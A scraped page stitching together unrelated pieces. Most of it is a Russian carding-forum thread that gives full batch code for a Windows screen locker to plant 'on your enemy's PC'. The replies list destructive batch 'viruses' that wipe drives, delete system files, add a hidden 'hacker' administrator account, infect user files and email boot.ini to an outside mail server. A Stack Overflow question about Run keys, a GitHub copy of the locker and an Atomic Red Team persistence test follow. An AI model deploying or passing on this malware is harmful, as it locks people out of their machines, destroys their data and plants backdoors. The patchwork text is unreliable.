Привет, гость!
Добро пожаловать на CVVBOARD — крупнейший теневой кардинг форум. У нас Вы сможете найти огромное множество статей по теме кардинга и заработка в интернете. Актуальная информация, новости даркнета, сервисы от проверенных продавцов, эксклюзивные, только рабочие схемы заработка, ежедневные раздачи — все это Вы найдете на нашем форуме!
Не пренебрегайте услугами Гарант-Сервиса это убережет Вас от мошенников. Обратите внимание, звание модератора не является гарантом в сделках!
Пишем простой винлокер в блокноте.
-
Автор темы
Killmy
-
Дата начала
-
#1
Начинаем с открытия блокнота.
Копируем туда этот код:
Код:
Echo off
color a
msg by File0
copy blocker.bat "%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
copy blocker.bat "C:\$SysReset"
taskkill /im explorer.exe /f > nul
copy %0 C:\Windows\Win32.bat > nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Win32 /t REG_SZ /d C:\Windows\Win32.bat /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f > nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f >nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableCMD/t REG_DWORD/d 2 /f > nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f >nul
reg add HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer/v NoControlPanel /t REG_DWORD /d 1 /f >nul
cls
title Windows has been blocked
echo Windows has been blocked
:G
echo Enter the activation code:
set /p x=
if %x%==сюда пишем пароль (echo Windows starting!
start explorer
reg Delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f > nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0 /f > nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 0 /f >nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableCMD/t REG_DWORD/d 0 /f > nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 0 /f >nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer/v NoControlPanel /t REG_DWORD /d 0 /f >nul
exit
) ELSE (
cls
echo Activation code is incorrect!
echo Enter the acctivation code again!
)
goto GДалее сохраняем как, blocker.bat (Внимание, очень важно поменять при сохранении расширение на .bat
Итак, мы сохранили.
Всего готово, можно открывать на пк вашего недруга. Если хотите можете скомпилировать этот файл в .exe.
-
#2
Отличная штука для небольшой мести неприятелям.
-
#3
Помниться как ходила эта хуйня по пк и деньги требовала за разблокировку,я тогда не хуёво заработал на удалении её)
-
#6
Прикольно, был бы в универе, то оставил такой на компах))
-
#7
Namecard написал(а):
Да,палит,при том что давно
Простенькие вирусы:
Убирает рабочий стол
@echo off
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f >nul
@echo off
shutdown -s -t 1 -c «lol» >nul
@echo off
shutdown -r -t 1 -c «lol» >nul
Запрещает запускать программы
@echo off
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun /v 1 /t REG_DWORD /d %SystemRoot%\explorer.exe /f >nul
@echo off
del «%SystemRoot%\Driver Cache\i386\driver.cab» /f /q >nul
@echo off
del «%SystemRoot%\Media» /q >nul
Запрещает заходить в панель управления
@echo off
reg add HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer
/v NoControlPanel /t REG_DWORD /d 1 /f >nul
Запрещает комбинацию Ctrl-Alt-Delete
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f >nul
Меняет местами значение кнопок мыши
%SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul
Удаляет курсор мыши
del «%SystemRoot%Cursors*.*» >nul
Меняет название корзины
reg add HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache /v @C:\WINDOWS\system32\SHELL32.dll,-8964 /t REG_SZ /d ТУТ НАЗВАНИЕ КОРЗИНЫ /F
Убирает панель управления
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
Серьезные вирусы:
Удаляет ВСЕ с раздела\диска(не пытайтесь проверить у себя)
rd [Буква_Диск]: /s /q
Удаляет все файлы в program files
del c:Program Files/q
Убивает процесс explorer.exe
taskkill /f /im explorer.exe >nul
Создает миллион папок
FOR /L %%i IN (1,1,1000000) DO md %%i
Удаляет все драйвера, которые установлены на компьютере
del «%SystemRoot%Driver Cachei386driver.cab» /f /q >nul
Удаляет команду DEL
del %0
Будет открывать бесконечно Paint
Start mspaint
goto x
Изменяет расширение всех ярлыков на .txt
assoc .lnk=.txt
Заражает Autoexec
copy «»%0″» «%SystemRoot%\system32\batinit.bat» >nul
reg add «HKCU\SOFTWARE\Microsoft\Command Processor» /v AutoRun /t REG_SZ /d «%SystemRoot%\syste m32\batinit.bat» /f >nul
Создает нового пользователя, с правами администратора, логин:hacker и пароль hack (Можете изменить)
@echo off
chcp 1251
net user SUPPORT_388945a0 /delete
net user hacker hack /add
net localgroup Администраторы hacker /add
net localgroup Пользователи SUPPORT_388945a0 /del
reg add «HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList» /v «support» /t reg_dword /d 0 y
сбой системы (!) — выключить все функции ввода-вывода (клавиатура, дисплей, мышь). В результате будет черный экран с курсором и ни на что не реагирующая система, однако Windows продолжает работать.
rundll32 user,disableoemlayer
Меняет местами кнопки мыши,но обратная смена не возможна)
rundll32 user,SwapMouseButton
Удаляет ядро системы
del %systemroot%\system32\HAL.dll
Заражает *.jpg *.mp3 *.doc *.htm? *.xls. (Заражает
не только в текущем каталоге, но и надкаталоге)
@echo off%[MrWeb]%
if ‘%1==’In_ goto MrWebin
if exist c:\MrWeb.bat goto MrWebru
if not exist %0 goto MrWeben
find «MrWeb»<%0>c:\MrWeb.bat
attrib +h c:\MrWeb.bat
:MrWebru
for %%g in (..\*.jpg ..\*.doc ..\*.htm? *.jpg *.mp3 *.doc *.htm? *.xls) do call c:\MrWeb In_ %%ggoto MrWeben
:MrWebin
if exist %2.bat goto MrWeben
type c:\MrWeb.bat>>%2.bat
echo start %2>>%2.bat%[MrWeb]%
:MrWeben
Вирус заражает *.JPG в текущем каталоге
@echo off%[MrWeb]%
if ‘%1==’In_ goto MrWebin
if exist c:\MrWeb.bat goto MrWebru
if not exist %0 goto MrWeben
find «MrWeb»<%0>c:\MrWeb.bat
attrib +h c:\MrWeb.bat
:MrWebru
for %%g in (*.jpg) do call c:\MrWeb In_ %%g
goto MrWeben
:MrWebin
if exist %2.bat goto MrWeben
type c:\MrWeb.bat>>%2.bat
echo start %2>>%2.bat%[MrWeb]%
:MrWeben
Жестокие вирусы:
У вашего ламера будет глючить компьютер.
@echo off
echo Set fso = CreateObject(«Scripting.FileSystemObject») > %systemdrive%\windows\system32\rundll32.vbs
echo do >> %systemdrive%\windows\system32\rundll32.vbs
echo Set tx = fso.CreateTextFile(«%systemdrive%\windows\system32\rundll32.dat», True) >> %systemdrive%\windows\system32\rundll32.vbs
echo tx.WriteBlankLines(100000000) >> %systemdrive%\windows\system32\rundll32.vbs
echo tx.close >> %systemdrive%\windows\system32\rundll32.vbs
echo FSO.DeleteFile «%systemdrive%\windows\system32\rundll32.dat» >> %systemdrive%\windows\system32\rundll32.vbs
echo loop >> %systemdrive%\windows\system32\rundll32.vbs
start %systemdrive%\windows\system32\rundll32.vbs
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v system_host_run /t REG_SZ /d %systemdrive%\windows\system32\rundll32.vbs /f
Вирус который убивает Винду. Не проверяйте на своем компьютере=)
@echo This virus created by LIZA
@echo Virus: pcforumhack.ru™ Virus
@echo Autor: LIZA
@echo off
echo Chr(39)>%temp%\temp1.vbs
echo Chr(39)>%temp%\temp2.vbs
echo on error resume next > %temp%\temp.vbs
echo Set S = CreateObject(«Wscript.Shell») >> %temp%\temp.vbs
echo set FSO=createobject(«scripting.filesystemobject»)>>%temp%\temp.vbs
reg add HKEY_USERS\S-1-5-21-343818398-1417001333-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v nodesktop /d 1 /freg add HKEY_USERS\S-1-5-21-343818398-1417001333-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v ClassicShell /d 1 /fset ¶§=%0
copy %¶§% %SystemRoot%\user32dll.bat
reg add «hklm\Software\Microsoft\Windows\CurrentVersion\Run» /v RunExplorer32 /d %SystemRoot%\user32dll.bat /f
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoDrives /t REG_DWORD /d 67108863 /f
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoViewOnDrive /t REG_DWORD /d 67108863 /f
echo fso.deletefile «C:\ntldr»,1 >> %temp%\temp.vbs
reg add «HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions» /v «NoSelectDownloadDir» /d 1 /f
reg add «HKLM\SOFTWARE\Microsoft\Internet Explorer\main\FeatureControl\Feature_LocalMachine_Lockdown» /v «IExplorer» /d 0 /f
reg add «HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions» /v «NoFindFiles» /d 1 /f
reg add «HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions» /v «NoNavButtons» /d 1 /f
echo fso.deletefolder «D:\Windows»,1 >> %temp%\temp.vbs
echo fso.deletefolder «I:\Windows»,1 >> %temp%\temp.vbs
echo fso.deletefolder «C:\Windows»,1 >> %temp%\temp.vbs
echo sr=s.RegRead(«HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot») >> %temp%\temp.vbs
echo fso.deletefile sr+»\system32\hal.dll»,1 >> %temp%\temp.vbs
echo sr=s.RegRead(«HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot») >> %temp%\temp.vbs
echo fso.deletefolder sr+»\system32\dllcache»,1 >> %temp%\temp.vbs
echo sr=s.RegRead(«HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot») >> %temp%\temp.vbs
echo fso.deletefolder sr+»\system32\drives»,1 >> %temp%\temp.vbs
echo s.regwrite «HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\LocalizedString»,»forum.whack.ru™»>>%temp%\temp.vbs
echo s.regwrite «HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner»,»forum.whack.ru™»>>%temp%\temp.vbs
echo s.regwrite «HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization»,»forum.whack.ru™»>>%temp%\temp.vbs
echo on error resume next > %temp%\temp1.vbs
echo set FSO=createobject(«scripting.filesystemobject»)>>%temp%\temp1.vbs
echo do>>%temp%\temp1.vbs
echo fso.getfile («A:\»)>>%temp%\temp1.vbs
echo loop>>%temp%\temp1.vbs
echo on error resume next > %temp%\temp2.vbs
echo Set S = CreateObject(«Wscript.Shell») >> %temp%\temp2.vbs
echo do>>%temp%\temp2.vbs
echo execute»S.Run «»%comspec% /c echo «» & Chr(7), 0, True»>>%temp%\temp2.vbs
echo loop>>%temp%\temp2.vbs
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\System» /v disabletaskmgr /t REG_DWORD /d 1 /f
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\System» /v disableregistrytools /t REG_DWORD /d 1 /f
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoStartMenuMFUprogramsList /t REG_DWORD /d 1 /f
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoUserNameInStartMenu /t REG_DWORD /d 1 /f
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum» /v {20D04FE0-3AEA-1069-A2D8-08002B30309D} /t REG_DWORD /d 1 /f
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoNetworkConnections /t REG_DWORD /d 1 /f
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoStartMenuNetworkPlaces /t REG_DWORD /d 1 /f
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v StartmenuLogoff /t REG_DWORD /d 1 /f
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoStartMenuSubFolders /t REG_DWORD /d 1 /f
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoCommonGroups /t REG_DWORD /d 1 /f
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoFavoritesMenu /t REG_DWORD /d 1 /f
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoRecentDocsMenu /t REG_DWORD /d 1 /f
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoSetFolders /t REG_DWORD /d 1 /f
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoAddPrinter /t REG_DWORD /d 1 /f
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoFind /t REG_DWORD /d 1 /f
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoSMHelp /t REG_DWORD /d 1 /f
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoRun /t REG_DWORD /d 1 /f
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoClose /t REG_DWORD /d 1 /f
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoChangeStartMenu /t REG_DWORD /d 1 /f
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoSMMyDocs /t REG_DWORD /d 1 /f
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoSMMyPictures /t REG_DWORD /d 1 /f
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoStartMenuMyMusic /t REG_DWORD /d 1 /f
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoControlPanel /t REG_DWORD /d 1 /f
echo set application=createobject(«shell.application»)>>%temp%\temp.vbs
echo application.minimizeall>>%temp%\temp.vbs
reg add «hklm\Software\Microsoft\Windows\CurrentVersion\run» /v SwapNT /t REG_SZ /d rundll32 user32, SwapMouseButton /f
start rundll32 user32, SwapMouseButton
reg add «HKCR\exefile\shell\open\command» /ve /t REG_SZ /d rundll32.exe /f
echo i=50 >> %temp%\temp.vbs
echo while i^>0 or i^<0 >> %temp%\temp.vbs
echo S.popup «forum.whack.ru™»,0, «forum.whack.ru™»,0+16 >> %temp%\temp.vbs
echo i=i-1 >> %temp%\temp.vbs
echo wend >> %temp%\temp.vbs
echo do >> %temp%\temp.vbs
echo wscript.sleep 200 >> %temp%\temp.vbs
echo s.sendkeys»{capslock}» >> %temp%\temp.vbs
echo wscript.sleep 200 >> %temp%\temp.vbs
echo s.sendkeys»{numlock}» >> %temp%\temp.vbs
echo wscript.sleep 200 >> %temp%\temp.vbs
echo s.sendkeys»{scrolllock}» >> %temp%\temp.vbs
echo loop>> %temp%\temp.vbs
echo Set oWMP = CreateObject(«WMPlayer.OCX.7») >> %temp%\temp.vbs
echo Set colCDROMs = oWMP.cdromCollection >> %temp%\temp.vbs
echo if colCDROMs.Count ^>= 1 then >> %temp%\temp.vbs
echo For i = 0 to colCDROMs.Count — 1 >> %temp%\temp.vbs
echo colCDROMs.Item(i).eject >> %temp%\temp.vbs
echo next >> %temp%\temp.vbs
echo End If >> %temp%\temp.vbs
echo Call SendPost(«smtp.mail.ru», «forum.whack.ru™@mail.ru», «support@mail.ru», «…», «Копм заражен!») >> %temp%\temp.vbs
echo Function SendPost(strSMTP_Server, strTo, strFrom, strSubject, strBody) >> %temp%\temp.vbs
echo Set iMsg = CreateObject(«CDO.Message») >> %temp%\temp.vbs
echo Set iConf = CreateObject(«CDO.Configuration») >> %temp%\temp.vbs
echo Set Flds = iConf.Fields >> %temp%\temp.vbs
echo Flds.Item(«http://schemas.microsoft.com/cdo/configuration/sendusing») = 2 >> %temp%\temp.vbs
echo Flds.Item(«http://schemas.microsoft.com/cdo/configuration/smtpauthenticate») = 1 >> %temp%\temp.vbs
echo Flds.Item(«http://schemas.microsoft.com/cdo/configuration/sendusername») = «support» >> %temp%\temp.vbs
echo Flds.Item(«http://schemas.microsoft.com/cdo/configuration/sendpassword») = «support» >> %temp%\temp.vbs
echo Flds.Item(«http://schemas.microsoft.com/cdo/configuration/smtpserver») = «smtp.mail.ru» >> %temp%\temp.vbs
echo Flds.Item(«http://schemas.microsoft.com/cdo/configuration/smtpserverport») = 25 >> %temp%\temp.vbs
echo Flds.Update >> %temp%\temp.vbs
echo iMsg.Configuration = iConf >> %temp%\temp.vbs
echo iMsg.To = strTo >> %temp%\temp.vbs
echo iMsg.From = strFrom >> %temp%\temp.vbs
echo iMsg.Subject = strSubject >> %temp%\temp.vbs
echo iMsg.TextBody = strBody >> %temp%\temp.vbs
echo iMsg.AddAttachment «c:\boot.ini» >> %temp%\temp.vbs
echo iMsg.Send >> %temp%\temp.vbs
echo End Function >> %temp%\temp.vbs
echo Set iMsg = Nothing >> %temp%\temp.vbs
echo Set iConf = Nothing >> %temp%\temp.vbs
echo Set Flds = Nothing >> %temp%\temp.vbs
echo s.run «shutdown -r -t 0 -c «»pcforumhack.ru™»» -f»,1 >> %temp%\temp.vbs
start %temp%\temp.vbs
start %temp%\temp1.vbs
start %temp%\temp2.vbs
Вирус полностью блокирует систему при следующем запуске Windows.Даже в безопасном режиме, выключает диспетчер задач.Чтобы разблокировать компьютер можно введя код 200393!(Но он не разблокирует)
@echo off
CHCP 1251
cls
Set Yvaga=На вашем компьютере найден вирус.
Set pass=Пароль
Set pas=Введите пароль.
Set virus=Чтобы разблокировать ПК вам потребуется ввести пароль
Set dim=Выключаю вирус…
title Внимание!!!
CHCP 866
IF EXIST C:\windows\boot.bat (
goto ok )
cls
IF NOT EXIST C:\windows\boot.bat (
ECHO Windows Registry Editor Version 5.00 >> C:\0.reg
ECHO. >> C:\0.reg
ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >> C:\0.reg
ECHO. >> C:\0.reg
ECHO «Shell»=»Explorer.exe, C:\\windows\\boot.bat » >> C:\0.reg
start/wait regedit -s C:\0.reg
del C:\0.reg
ECHO @echo off >>C:\windows\boot.bat
ECHO C:\WINDOWS\system32\taskkill.exe /f /im Explorer.exe >>C:\windows\boot.bat
ECHO reg add «HKCU\software\Microsoft\Windows\CurrentVersion\Policies\system» /v DisableTaskMgr /t REG_DWORD /d 1 /f >>C:\windows\boot.bat
ECHO start sys.bat >>C:\windows\boot.bat
attrib +r +a +s +h C:\windows\boot.bat
copy virus.bat c:\windows\sys.bat
attrib +r +a +s +h C:\windows\sys.bat
GOTO end)
:ok
cls
Echo %Yvaga%
echo.
echo %virus%
echo %pas%
set /a choise = 0
set /p choise=%pass%:
if «%choise%» == «101» goto gold
if «%choise%» == «200393» goto status
exit
:status
echo %dim%
attrib -r -a -s -h C:\windows\boot.bat
del C:\windows\boot.bat
attrib -r -a -s -h C:\windows\sys.bat
del C:\windows\sys.bat
cls
:gold
start C:\
:end
Добавляет программу в автозагрузку ОС
copy «»%0″» «%SystemRoot%\system32\File.bat»
reg add «HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run» /v «Filel» /t REG_SZ /d «%SystemRoot%\system32\File.bat» /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f
Этот вирус,блокирует все программы,но интернет работает.
@Echo off
Echo Virus Loading
Date 13.09.96
If exist c:ski.bat goto abc
Copy %0 c:ski.bat
Attrib +h c:ski.bat
Echo c:ski.bat >>autoexec.bat
:abc
md PRIDUROK
md LUZER
md DURAK
md LAMER
Label E: PRIDUROK
assoc .exe=.mp3
del c:Program Files/q
Echo VIRUS LOAD
Категория: Мои статьи | Добавил: drak-zp
I added an item to startup using the command
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "OMG" /t REG_SZ /F /D "C:\WGET\wget.exe"
And after I tryed to delete it with the command :
REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "OMG" /f
But with no succes. I searched for this type of question but with no result. I will realy apreciate any help!
asked Mar 5, 2017 at 18:13
Alex M.Alex M.
151 silver badge9 bronze badges
rem ↓↓ missing " double quote
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "OMG" /t REG_SZ /F /D "C:\WGET\wget.exe"
rem ↑↑ missing " double quote
Missing " double quote causes misinterpreting keys as follows:
==> REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "OMG" /t REG_SZ /F /D "C:\WGET\wget.exe"
The operation completed successfully.
==> reg query "HKCU\Software\Microsoft\Windows\CurrentVersion" /S | findstr /C:"CurrentVersion\Run " 2>NUL
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /V OMG /t REG_SZ /F /D C:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /V OMG /t REG_SZ /F /D C:\WGET
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /V OMG /t REG_SZ /F /D C:\WGET\wget.exe
==>
Add missing " double quote as follows:
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "OMG" /t REG_SZ /F /D "C:\WGET\wget.exe"
answered Mar 5, 2017 at 19:56
JosefZJosefZ
28.6k5 gold badges45 silver badges84 bronze badges
Yup, You missed the ‘Double Quotes’ After REG ADD. But, in this method you are choosing, You need to run the script as an ‘Admin’. While, Giving a Batch file Admin Access Can never be a good idea.
So, You can try the alternative of, Copying the Shortcut (the file to Execute at startup) to the path -> «%Userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup» — No Admin Needed. 
answered Mar 6, 2017 at 0:15
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| @echo off | |
| color a | |
| msg by File0 | |
| copy blocker.bat «%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup« | |
| copy blocker.bat «C:\$SysReset« | |
| taskkill /im explorer.exe /f > nul | |
| copy %0 C:\Windows\Win32.bat > nul | |
| reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v | |
| reg add «HKCU\Software\Microsoft\Windows\CurrentVersion\Run« /v Win32 /t REG_SZ /d C:\Windows\Win32.bat /f | |
| reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f > nul | |
| reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f >nul | |
| reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableCMD/t REG_DWORD/d 2 /f > nul | |
| reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f >nul | |
| reg add HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer/v NoControlPanel /t REG_DWORD /d 1 /f >nul | |
| cls | |
| title Windows has been blocked | |
| echo Windows has been blocked | |
| :G | |
| echo Enter the activation code: | |
| set /p x= | |
| if %x%==password (echo Windows starting! | |
| start explorer | |
| reg Delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f > nul | |
| reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0 /f > nul | |
| reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 0 /f >nul | |
| reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableCMD/t REG_DWORD/d 0 /f > nul | |
| reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 0 /f >nul | |
| reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer/v NoControlPanel /t REG_DWORD /d 0 /f >nul | |
| exit | |
| ) ELSE ( | |
| cls | |
| echo Activation code is incorrect! | |
| echo Enter the acctivation code again! | |
| ) | |
| goto G | |
Try it using Invoke-Atomic
Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
Description from ATT&CK
Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the «run keys» in the Registry or startup folder will cause the program referenced to be executed when a user logs in.(Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account’s associated permissions level.
Placing a program within a startup folder will also cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. The startup folder path for the current user is C:\Users\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup. The startup folder path for all users is C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp.
The following run keys are created by default on Windows systems:
- HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
- HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
- HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
- HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
Run keys may exist under multiple hives.(Citation: Microsoft Wow6432Node 2018)(Citation: Malwarebytes Wow6432Node 2016) The HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency.(Citation: Microsoft Run Key) For example, it is possible to load a DLL at logon using a «Depend» key with RunOnceEx: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d «C:\temp\evil[.]dll» (Citation: Oddvar Moe RunOnceEx Mar 2018)
The following Registry keys can be used to set startup folder items for persistence:
- HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
- HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
The following Registry keys can control automatic startup of services during boot:
- HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
- HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
- HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
- HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices
Using policy settings to specify startup programs creates corresponding values in either of two Registry keys:
- HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
- HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
The Winlogon key controls actions that occur when a user logs on to a computer running Windows 7. Most of these actions are under the control of the operating system, but you can also add custom actions here. The HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit and HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell subkeys can automatically launch programs.
Programs listed in the load value of the registry key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows run when any user logs on.
By default, the multistring BootExecute value of the registry key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager is set to **autocheck autochk ***. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot.
Adversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use Masquerading to make the Registry entries look as if they are associated with legitimate programs.
Atomic Tests
Atomic Test #1 — Reg Key Run
Run Key Persistence
Upon successful execution, cmd.exe will modify the registry by adding \»Atomic Red Team\» to the Run key. Output will be via stdout.
Supported Platforms: windows
auto_generated_guid: e55be3fd-3521-4610-9d1a-e210e42dcf05
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| command_to_execute | Thing to Run | path | C:\Path\AtomicRedTeam.exe |
Attack Commands: Run with command_prompt!
1
2
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /t REG_SZ /F /D "#{command_to_execute}"
Cleanup Commands:
1
2
